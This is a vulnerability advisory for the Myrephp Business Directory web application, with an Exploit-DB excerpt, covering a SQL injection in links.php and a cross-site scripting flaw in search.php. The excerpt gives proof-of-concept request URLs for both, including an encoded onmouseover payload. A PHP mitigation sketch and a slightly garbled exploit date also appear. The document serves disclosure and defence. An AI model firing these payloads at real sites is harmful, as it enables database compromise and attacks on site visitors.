Vendor: Myrephp Business Directory
By: d3b4g
CVSS: 8,8 HIGH
SQL Injection, Cross Site Scripting
CWE: 89, 79
Product Name: Myrephp Business Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2020

Myrephp Business Directory, Multiple Vulnerabilities

Myrephp Business Directory contains two vulnerabilities. An attacker can inject malicious SQL queries into the application by manipulating the 'cat' parameter of the 'links.php' page, and can inject malicious JavaScript code into the application by manipulating the 'look' parameter of the 'search.php' page.

Mitigation:

The application should use parameterized queries, and input validation should be implemented to prevent malicious code from being injected.
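
An added PHP sketch of this mitigation for the two parameters named above. It is not Myrephp's code, which this page does not show: the table, column and function names, the in-memory SQLite database and the form markup are assumptions. It also encodes 'look' on output, which input validation alone does not cover.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database. The table and column
// names are assumptions, not taken from Myrephp's source.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE links (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)');
$pdo->exec("INSERT INTO links (cat, title) VALUES (1, 'Cafe'), (2, 'Garage')");

/** links.php side: validate 'cat' as a positive integer, then bind it. */
function linksForCategory(PDO $pdo, string $rawCat): array
{
    $cat = filter_var($rawCat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cat === false) {
        return [];  // anything that is not a plain integer never reaches the query
    }
    // The value travels as a bound parameter, never as part of the SQL text.
    $stmt = $pdo->prepare('SELECT title FROM links WHERE cat = :cat');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

/** search.php side: encode 'look' for the HTML attribute it is echoed into. */
function renderLookField(string $rawLook): string
{
    // ENT_QUOTES encodes both ' and ", so the value cannot close the attribute
    // and introduce an event handler. The hidden-input markup is hypothetical.
    $safe = htmlspecialchars($rawLook, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='hidden' name='look' value='" . $safe . "'>";
}

// Constructed inputs shaped like the two requests listed in this advisory.
var_dump(linksForCategory($pdo, '1'));   // valid category: rows are returned
var_dump(linksForCategory($pdo, "1'"));  // trailing quote: rejected by validation
echo renderLookField("' onmouseover=prompt(945724) bad='"), PHP_EOL;
```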

Exploit-DB raw data:

# Exploit Title: Myrephp Business Directory,  Multiple Vulnerabilities
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://myrephp.com
# Software Link: http://myrephp.com/biz/
# Tested on: Windows 7
# Blog: d3b4g.me

  ----------------------------------------------------------------------------------
  () SQL Injection :

   ---------------------------

  http://localhost/path/links.php?cat=1'[Insert Query]


  () Cross Site Scripting:-


   http://localhost/path/search.php?keywords1=&keywords2=&look=%27%20onmouseover%3dprompt%28945724%29%20bad%3d%27&nolinks1=10&order=city&page=2&sort=ASC